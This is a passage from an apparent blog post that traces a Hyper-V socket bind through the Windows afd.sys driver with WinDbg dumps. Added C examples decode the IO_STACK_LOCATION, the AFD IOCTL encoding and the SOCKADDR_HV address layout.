<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F728</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 0x12003 (the AFD bind IOCTL, handled by afd!AfdBind below)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength, 0x28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0x24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For illustration, let's confirm these handles with handle.exe from the Sysinternals Suite:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">handle.exe -a -p ServerExample.exe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">140: Event </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">144: File (---) \Device\Afd\Endpoint (on the client: \Device\Afd)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 1223088 1223088+28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223088 00000000 00000022 00000000 00000000 ...."...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223098 00000000 00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">........>.....pE – </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GUID of our service (the four zero dwords before it are the VmId, HV_GUID_ZERO)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">012230a8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">487662ad 1b7a9d77 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">abababab .bvHw.z.....</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The afd.sys driver registers the following dispatch routine for IOCTL requests (IRP_MJ_DEVICE_CONTROL):</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> !drvobj afd 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Driver object (ffffa40eb952c0d0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dispatch routines:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0e] IRP_MJ_DEVICE_CONTROL fffff8008ab7d460</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchDeviceControl</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Fast I/O routines:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoRead fffff80aa54fbed0 afd!AfdFastIoRead</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoWrite fffff80aa54fbfd0 afd!AfdFastIoWrite</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoUnlockAll fffff80aa55018f0 afd!AfdSanFastUnlockAll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FastIoDeviceControl fffff80aa54f1ab0 afd!AfdFastIoDeviceControl</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's look at what happens in the kernel at this stage. IOCTL code 0x12003 is looked up in AfdIoctlTable, and the matching entry in AfdIrpCallDispatch is afd!AfdBind, which is called from afd!AfdDispatchDeviceControl.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="187" src="https://lh3.googleusercontent.com/_AyNJomMRFFjPcc_WECg010TLq2mfRbPad5oq-VkSRjTn4TGLGT4xyKVvRdSk8NACnFEHzLRQf07ZtNkr54cxyrAdYqIKkcgMKd-eU25XdQTMIyJh0h3n3_IUEKyD3HKZgBvh4m-8G0nAM8n8w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="365" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A pointer to the IRP is passed to afd!AfdBind as its first parameter (in rcx):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!irp @rcx 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Irp is active with 4 stacks 4 is current (= 0xffffda8527506d18) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UserIosb = 00e6e920</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UserEvent = ffffda85299be6f0 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UserBuffer = 01223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmd flg cl Device File Completion-Context</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">>[IRP_MJ_DEVICE_CONTROL(e), N/A(0)]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 5 0 ffffda8527de29d0 ffffda8529a9bcf0 00000000-00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Args: 00000024 00000028 00012003 01223088</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!object @r8 – 3rd parameter: Driver Object</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8527de19c0 Type: (ffffda852718cf20) Driver</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8527de1990 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 0 PointerCount: 4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: ffffca897e8f7060 Name: AFD</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx – 2nd parameter: the current IO_STACK_LOCATION</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d18 0005000e 00000000 00000024 00000000 ........$....... – MajorFunction 0e (IRP_MJ_DEVICE_CONTROL), Flags 05; OutputBufferLength 0x24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d28 00000028 00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00012003</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 (............... – InputBufferLength 0x28, </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">IoControlCode</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d38 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">01223088</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">27de29d0 ffffda85</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> .0"......).'.... – </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Type3InputBuffer (same address as UserBuffer), </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">DeviceObject (Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27506d48 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">29a9bcf0 ffffda85</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 ...)............ – </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">FileObject (\Endpoint {Afd})</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First the input and output buffer sizes (0x28 and 0x24 bytes respectively) and the other parameters are checked. A pool buffer of 0x24 bytes is then allocated and the address passed from user mode is copied into it (the memmove below). Note that the copy starts at 0122308c, four bytes past the start of the user buffer: the leading dword is skipped and exactly the 0x24-byte socket address is captured into kernel memory.</span></div>
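<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (my code, not from this post and not from afd.sys), the following decodes the dc @rdx dump of the current IO_STACK_LOCATION shown above into its fields and splits the IOCTL code the way AFD encodes it: base 0x12 (FILE_DEVICE_NETWORK) in bits 12 and up, the request index in bits 2 to 11, and the transfer method in the low two bits, which makes 0x12003 request 0 with method 3. The struct reproduces the first 56 bytes of the x64 IO_STACK_LOCATION for IRP_MJ_DEVICE_CONTROL (CompletionRoutine and Context are left off) and the sample dwords are the ones in the dump. Method 3 is METHOD_NEITHER, so Type3InputBuffer and Irp->UserBuffer (both 01223088 above) are raw user-mode pointers that the I/O manager has not validated; that is why AfdBind has to check the lengths and copy the address into its own pool allocation before using it. The minimum lengths below are an assumption: the text says the sizes are checked but not how.</span></div>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* First 56 bytes of the x64 IO_STACK_LOCATION for IRP_MJ_DEVICE_CONTROL
 * (Parameters.DeviceIoControl is the union member in use). Offsets match the
 * dump: +0 Major/Minor/Flags/Control, +8 OutputBufferLength, +16 InputBufferLength,
 * +24 IoControlCode, +32 Type3InputBuffer, +40 DeviceObject, +48 FileObject. */
typedef struct {
    uint8_t  major_function;
    uint8_t  minor_function;
    uint8_t  flags;
    uint8_t  control;
    uint32_t pad0;                    /* Parameters union is 8-byte aligned */
    uint32_t output_buffer_length;
    uint32_t pad1;
    uint32_t input_buffer_length;
    uint32_t pad2;
    uint32_t io_control_code;
    uint32_t pad3;
    uint64_t type3_input_buffer;      /* user-mode pointer under METHOD_NEITHER */
    uint64_t device_object;
    uint64_t file_object;
} iosl_devctl_t;

#define IRP_MJ_DEVICE_CONTROL 0x0e
#define METHOD_NEITHER        3
#define FSCTL_AFD_BASE        0x12     /* FILE_DEVICE_NETWORK */
#define AFD_BIND_INPUT_MIN    0x28     /* assumed: leading dword + 0x24-byte SOCKADDR_HV */
#define AFD_BIND_OUTPUT_MIN   0x24     /* assumed: room to return the bound address */

/* Load the dwords of `dc @rdx` (memory order, little-endian x64) into the struct. */
int iosl_from_dump(const uint32_t *dw, size_t ndw, iosl_devctl_t *out)
{
    if (ndw * sizeof *dw < sizeof *out) return -1;
    memcpy(out, dw, sizeof *out);
    return 0;
}

/* AFD's own IOCTL encoding: (FSCTL_AFD_BASE << 12) | (request << 2) | method.
 * Returns the request index (0 is bind) or -1 if the code is not an AFD code. */
int afd_ioctl_request(uint32_t code, unsigned *method)
{
    if ((code >> 12) != FSCTL_AFD_BASE) return -1;
    if (method) *method = code & 3;
    return (int)((code >> 2) & 0x3ff);
}

/* True when the driver is handed raw user pointers: a METHOD_NEITHER device
 * control. Type3InputBuffer / Irp->UserBuffer must then be probed and copied
 * by the driver itself. */
int iosl_user_pointers_raw(const iosl_devctl_t *s)
{
    return s->major_function == IRP_MJ_DEVICE_CONTROL &&
           (s->io_control_code & 3) == METHOD_NEITHER;
}

/* The size check made before the copy (the sizes are assumed to be minimums). */
int afd_bind_lengths_ok(const iosl_devctl_t *s)
{
    return s->input_buffer_length >= AFD_BIND_INPUT_MIN &&
           s->output_buffer_length >= AFD_BIND_OUTPUT_MIN;
}

/* The 16 dwords of the page's `dc @rdx` at ffffda85`27506d18. */
static const uint32_t STACK_DUMP[16] = {
    0x0005000e, 0x00000000, 0x00000024, 0x00000000,
    0x00000028, 0x00000000, 0x00012003, 0x00000000,
    0x01223088, 0x00000000, 0x27de29d0, 0xffffda85,
    0x29a9bcf0, 0xffffda85, 0x00000000, 0x00000000 };

int main(void)
{
    iosl_devctl_t s;
    unsigned method = 0;
    int request;

    if (iosl_from_dump(STACK_DUMP, 16, &s) != 0) return 1;
    request = afd_ioctl_request(s.io_control_code, &method);
    printf("Major %02x Minor %02x Flags %02x Control %02x\n",
           s.major_function, s.minor_function, s.flags, s.control);
    printf("IoControlCode %#x: AFD request %d, method %u%s\n",
           s.io_control_code, request, method,
           iosl_user_pointers_raw(&s) ? " (METHOD_NEITHER: user pointers not validated)" : "");
    printf("In %#x Out %#x Type3InputBuffer %#llx, lengths %s\n",
           s.input_buffer_length, s.output_buffer_length,
           (unsigned long long)s.type3_input_buffer,
           afd_bind_lengths_ok(&s) ? "ok" : "rejected");
    printf("DeviceObject %#llx FileObject %#llx\n",
           (unsigned long long)s.device_object, (unsigned long long)s.file_object);
    return 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The same decode works for any AFD IOCTL seen in a dispatch-routine breakpoint: paste the dwords of the stack location, read off the request index, and the low two bits tell you whether the driver is looking at user memory directly (method 3) or at a buffered copy.</span></div>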
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx – memmove source parameter (user buffer + 4)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0122308c 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000 00000000 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> "...............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0122309c </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`012230ac </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
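<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To tie the user-mode checks and the kernel copy together, here is an added example (my code, not from this post, mswsock or afd.sys). It defines the SOCKADDR_HV layout from hvsocket.h, applies the two checks mswsock was seen to make (address length against 0x24, first dword against 0x22), classifies the VmId against HV_GUID_LOOPBACK, HV_GUID_BROADCAST and HV_GUID_ZERO in the order described earlier, and parses the bind input buffer the way the kernel copy does, starting four bytes in. The sample dwords are copied from the dc dumps on this page (the client address from the esi dump, the server buffer from the 1223088 dump). A little-endian host is assumed; the meaning of the leading dword of the bind buffer (a share-type field) is an assumption; and the direction of the length check (too short is rejected) is the usual Winsock behaviour rather than something stated above.</span></div>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of GUID and SOCKADDR_HV (hvsocket.h), reproduced so this builds
 * without Windows headers. SOCKADDR_HV is 0x24 bytes:
 * Family(2) Reserved(2) VmId(16) ServiceId(16); no padding on any common ABI. */
typedef struct {
    uint32_t data1;
    uint16_t data2;
    uint16_t data3;
    uint8_t  data4[8];
} guid_t;

typedef struct {
    uint16_t family;      /* AF_HYPERV == 0x22 */
    uint16_t reserved;    /* 0 in every dump on the page */
    guid_t   vm_id;
    guid_t   service_id;
} sockaddr_hv_t;

#define AF_HYPERV        0x22
#define SOCKADDR_HV_LEN  0x24
#define WSAEFAULT        0x271E   /* error seen for a bad address length */
#define WSAEAFNOSUPPORT  0x273F   /* error seen for a family other than 0x22 */

/* Well-known VmIds from hvsocket.h that the text says the address is compared with. */
static const guid_t HV_GUID_ZERO      = {0, 0, 0, {0}};
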